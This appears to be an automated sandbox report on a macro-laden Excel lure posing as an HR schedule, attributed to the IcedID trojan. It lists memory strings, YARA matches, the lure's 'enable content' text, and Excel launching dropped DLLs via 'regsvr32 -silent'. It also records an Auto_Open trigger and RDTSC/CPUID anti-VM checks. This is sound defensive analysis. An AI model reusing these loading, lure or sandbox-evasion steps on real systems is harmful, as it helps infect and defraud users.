          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/psf/null
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/s_code/js/3.0/awshome_s_code.js
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/target/1.0.114/aws-target-mediator.js
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com;
          Source: regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpString found in binary or memory: https://amazon.com/
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2092889123.00000000027C3000.00000004.00000001.sdmpString found in binary or memory: https://amazonwebservicesinc.tt.omtrdc.net
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpString found in binary or memory: https://aws.amazon.com/
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/?nc1=h_ls
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/?nc2=h_lg
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ar/
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ar/?nc1=h_ls
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/cn/
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/cn/?nc1=h_ls
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/de/
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/de/?nc1=h_ls
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/es/
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/es/?nc1=h_ls
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/fr/
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/fr/?nc1=h_ls
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/id/
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/id/?nc1=h_ls
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/it/
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/it/?nc1=h_ls
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/jp/
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/jp/?nc1=h_ls
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ko/
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ko/?nc1=h_ls
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/marketplace/?nc2=h_mo
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/marketplace/?nc2=h_ql_mp
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/podcasts/aws-podcast/
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/privacy/?nc1=f_pr
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/pt/
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/pt/?nc1=h_ls
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ru/
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ru/?nc1=h_ls
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/search
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/search/
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/search/?searchQuery=
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/terms/?nc1=f_pr
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/th/
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/th/?nc1=f_ls
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tr/
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tr/?nc1=h_ls
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tw/
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tw/?nc1=h_ls
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/vi/
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/vi/?nc1=f_ls
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/?nc2=h_m_mc
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/billing/home?nc2=h_m_bc
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/console/home
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/console/home?nc1=f_ct&amp;src=footer-signin-mobile
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/iam/home?nc2=h_m_sc#security_credential
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/support/home/?nc1=f_dr
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/support/home/?nc2=h_ql_cu
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/support/home?nc2=h_ql_cu
          Source: regsvr32.exe, 00000004.00000003.2092889123.00000000027C3000.00000004.00000001.sdmpString found in binary or memory: https://d1.awsstatic.com
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=3038&amp;fmt=gif
          Source: regsvr32.exe, 00000004.00000003.2092889123.00000000027C3000.00000004.00000001.sdmpString found in binary or memory: https://devices.amazonaws.com?hp=tile&amp;so-exp=below
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://dgen8gghn3u86.cloudfront.net
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://dk261l6wntthl.cloudfront.net
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://docs.aws.amazon.com/index.html?nc2=h_ql_doc
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://download.stormacq.com/aws/podcast/
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://dts.podtrac.com
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://fls-na.amazon.com/1/action-impressions/1/OE/aws-mktg/action/awsm_:comp_DeprecatedBrowser
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://googleads.g.doubleclick.net
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://i18n-string.us-west-2.prod.pricing.aws.a2z.com
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://media.amazonwebservices.com
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://mktg-apac.s3-ap-southeast-1.amazonaws.com
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://pages.awscloud.com/communication-preferences?trk=homepage
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://pages.awscloud.com/fico-case-study.html?hp=tile&amp;story=fico
          Source: regsvr32.exe, 00000004.00000002.2098244987.000000000279D000.00000004.00000001.sdmpString found in binary or memory: https://pages.awscloud.com/zillow-case-study?hp=tile&amp;story=zllw
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://phd.aws.amazon.com/?nc2=h_m_sc
          Source: regsvr32.exe, 00000004.00000003.2092889123.00000000027C3000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?exp=default
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?exp=default&amp;sc_icampaign=
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc1=f_ct&amp;src=default
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc2=h_ct&amp;src=default
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/manageYourAccount?nc2=h_m_ma
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://press.aboutamazon.com/press-releases/aws
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://prod-us-west-2.csp-report.marketing.aws.dev/submit
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://prod-us-west-2.csp-report.marketing.aws.dev/submitx-amz-id-101KGS0X8RKQZRM7QXQJNX-Content-Ty
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2092889123.00000000027C3000.00000004.00000001.sdmpString found in binary or memory: https://s0.awsstatic.com
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://s0.awsstatic.com/en_US/nav/v3/panel-content/desktop/index.html
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://s0.awsstatic.com/en_US/nav/v3/panel-content/mobile/index.html
          Source: regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://static.doubleclick.net
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/awscloud
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://website.spot.ec2.aws.a2z.com
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://www.amazon.jobs/aws
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://www.buzzsprout.com;
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://www.gstatic.com;
          Source: regsvr32.exe, 00000004.00000003.2092889123.00000000027C3000.00000004.00000001.sdmpString found in binary or memory: https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://www.twitch.tv/aws
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://www.youtube.com/user/AmazonWebServices/Cloud/
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
          Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443

          E-Banking Fraud:

          barindex
          Yara detected IcedIDShow sources
          Source: Yara matchFile source: dump.pcap, type: PCAP
          Source: Yara matchFile source: 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2904, type: MEMORY

          System Summary:

          barindex
          Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
          Source: Document image extraction number: 0Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
          Source: Document image extraction number: 0Screenshot OCR: Enable Content button from the yellow bar above
          Source: Document image extraction number: 1Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
          Source: Document image extraction number: 1Screenshot OCR: Enable Content button from the yellow bar above
          Office process drops PE fileShow sources
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fmlJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XTOWN.dllJump to dropped file
          Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02001678 NtQuerySystemInformation,4_2_02001678
          Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_020018104_2_02001810
          Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000007FEF8FB15D04_2_000007FEF8FB15D0
          Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000007FEF8FB41BF4_2_000007FEF8FB41BF
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
          Source: Joe Sandbox ViewDropped File: C:\Users\user\XTOWN.dll 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
          Source: workbook.xmlBinary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x15" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><fileVersion appName="xl" lastEdited="6" lowestEdited="6" rupBuild="14420"/><workbookPr filterPrivacy="1" defaultThemeVersion="164011"/><bookViews><workbookView xWindow="0" yWindow="0" windowWidth="22260" windowHeight="12645"/></bookViews><sheets><sheet name="Sheet" sheetId="1" r:id="rId1"/><sheet name="Sheet1" sheetId="8" r:id="rId2"/><sheet name="Sheet2" sheetId="4" r:id="rId3"/><sheet name="Sheet3" sheetId="2" r:id="rId4"/><sheet name="Sheet4" sheetId="3" r:id="rId5"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">Sheet3!$CA$13</definedName></definedNames><calcPr calcId="162913"/><extLst><ext uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><x15:workbookPr chartTrackingRefBase="1"/></ext></extLst></workbook>
          Source: 4.2.regsvr32.exe.2000000.4.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
          Source: 4.2.regsvr32.exe.a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
          Source: 4.2.regsvr32.exe.a0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
          Source: 00000004.00000002.2096122245.00000000000A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
          Source: regsvr32.exe, 00000004.00000002.2099979951.0000000003090000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSM@7/4@7/5
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$HRScheduleH3965005.xlsmJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD365.tmpJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XRAY.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XTOWN.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XZIBIT.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XRAY.dllJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XTOWN.dllJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XZIBIT.dllJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: HRScheduleH3965005.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
          Source: HRScheduleH3965005.xlsmInitial sample: OLE zip file path = xl/media/image1.png
          Source: HRScheduleH3965005.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
          Source: HRScheduleH3965005.xlsmInitial sample: OLE zip file path = xl/calcChain.xml
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: XTOWN.dll.0.drStatic PE information: real checksum: 0x1baf8 should be: 0x19d85
          Source: lsdfik[1].fml.0.drStatic PE information: real checksum: 0x1baf8 should be: 0x19d85
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XRAY.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fmlJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XTOWN.dllJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XTOWN.dllJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fmlJump to dropped file

          Boot Survival:

          barindex
          Drops PE files to the user root directoryShow sources
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XTOWN.dllJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
          Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02001E50 4_2_02001E50
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Windows\System32\regsvr32.exeRDTSC instruction interceptor: First address: 0000000002001E71 second address: 0000000002001E96 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [esp+20h], eax 0x00000019 mov dword ptr [esp+24h], ebx 0x0000001d mov dword ptr [esp+28h], ecx 0x00000021 mov dword ptr [esp+2Ch], edx 0x00000025 rdtsc
          Source: C:\Windows\System32\regsvr32.exeRDTSC instruction interceptor: First address: 0000000002001EAB second address: 0000000002001EB8 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
          Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02002434 rdtsc 4_2_02002434
          Source: C:\Windows\System32\regsvr32.exeCode function: GetAdaptersInfo,GetAdaptersInfo,4_2_020027BC
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fmlJump to dropped file
          Source: regsvr32.exe, 00000004.00000003.2092889123.00000000027C3000.00000004.00000001.sdmpBinary or memory string: <a href="/rds/vmware/?hp=tile&amp;so-exp=below"> <i></i> <span>Amazon RDS on VMware</span> <cite>Automate on-premises database management</cite> </a>
          Source: regsvr32.exe, 00000004.00000003.2092889123.00000000027C3000.00000004.00000001.sdmpBinary or memory string: <a href="/vmware/?hp=tile&amp;so-exp=below"> <i></i> <span>VMware Cloud on AWS</span> <cite>Build a hybrid cloud without custom hardware</cite> </a>
          Source: regsvr32.exe, 00000004.00000003.2092928788.000000000279D000.00000004.00000001.sdmpBinary or memory string: <img src="//d1.awsstatic.com/Compute/VMware-Cloud-on-AWS_Icon_64_Squid.b126bc9cff89e6c44c4f5b9775521edd6743c2b8.png" alt="VMware-Cloud-on-AWS_Icon_64_Squid" title="VMware-Cloud-on-AWS_Icon_64_Squid" class="cq-dd-image" />
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpBinary or memory string: Migrate and extend VMware environments to the AWS Cloud
          Source: regsvr32.exe, 00000004.00000003.2092928788.000000000279D000.00000004.00000001.sdmpBinary or memory string: <a style="padding-left:20px; padding-bottom:0px; padding-right:45px;" href="/vmware/?hp=tile&amp;tile=hybridsol" target="_blank" rel="noopener">
